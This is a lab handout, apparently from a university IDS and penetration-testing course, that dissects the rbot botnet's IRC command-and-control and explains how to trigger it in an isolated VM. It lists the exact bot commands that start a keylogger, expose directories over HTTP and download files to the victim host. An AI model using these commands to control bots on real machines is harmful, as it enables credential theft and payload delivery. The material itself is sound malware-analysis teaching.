IDS and Penetration Testing Lab IIIa Dissecting a Botnet C&C - rbot Triggering Lab Malware operation Upon execution malware connects to botirc.net server and establishes standard IRC session with #test channel (PASS, NICK, USER). Typically malware registers itself with the following nick: [M]bBot XXXX, (where XXXX are random 4 digits). After establishing the session, malware enters an infinite loop that receives IRC messages, interprets commands and executes them. Via the commands, malware provides three main functionalities such as keylogger, http server and downloader. Experiment setup To run and trigger rbot malware, it is required to have IRC server and client and provide connectivity from malware to IRC server. In the setup demonstrated in the class, malware was executed in Windows XP SP2 VM (disconnected from Internet). This VM also runs local IRC server using bewareircd utility. To control the bot instance we run a simple IRC client using mirc utility. Since malware connects IRC server named as Botirc.net, we need to resolve it locally by adding a corresponding entry in %SYSTEMROOT%\system32\drivers\etc\hosts file. Such as 127.0.0.1 Botirc.net. Using this configuration, one can perform the following steps to activate rbot instance: 1. Run IRC server (c:\distr\bewareircd-win32\bircd.exe). It will create local IRC server ready to host new servers and channels 2. Setup mirc client. a. Start the client b. Create New IRC server (press Add, then specify Botirc.net any ID (e.g. r_bot_server_test)). This will register IRC server named Botirc.net :
c. Double click on created server: d. Enter #test channel and click Join. This will start IRC session.
e. Now you can run rbot(bbot) and you should see that it joined the session. You can send commands that given in the next section. Welcome to rbot C&C! Commands triggering To activate a component/functionality of the bot one need to send a certain notice message to the bot instance over the IRC channel. The table bellow presents the required format of IRC commands. Functionality/ Component Keylogger IRC command Command to malware: /notice bot_instance_nick keylog file Result Malware creates a thread that traces current window focus and pressed keys using hookless technique (i.e. GetAssyncKeyState based). The traced keys and context data is
Example: /notice [M]bBot 4842 keylog file stored in c:\windows\system32\key.txt Response from malware (if successful): [KEYLOG]: Key logger active. HTTP server Command to malware: /notice bot_instance_nick httpserver port path Malware starts a http server that listens to (port) and provides access to the specified directory (path). Example: /notice [M]bBot 4842 httpserver 1235 C:\windows\ Example response from malware (if successful): [HTTPD]: Server listening on IP: 127.0.0.1:1235, Directory: C:\windows\. Downloader Command to malware: /notice bot_instance_nick d0wnl04d URL target_file Malware downloads a file from the specified URL to a specified file on the victim host.
Example: /notice [M]bBot 9497 d0wnl04d http://gmail.com/gmail.htm c:\gmail_copy.htm Example response from malware (if successful): [DOWNLOAD]: Downloading URL: http://gmail.com/gmail.htm to: c:\gmail_copy.htm. [DOWNLOAD]: Downloaded 57.8 KB to c:\gmail_copy.htm @ 57.8 KB/sec. Examples Keylogger
The bellow figures show screenshots of successful keylogger activation. The first figure shows typical response from the malware to keylogger command. The second screen shows the log file (c:\windows\system32\key.txt). HTTP server The bellow figures show screenshots of successful http server activation.
Downloader The bellow figures show screenshots of successful http server activation.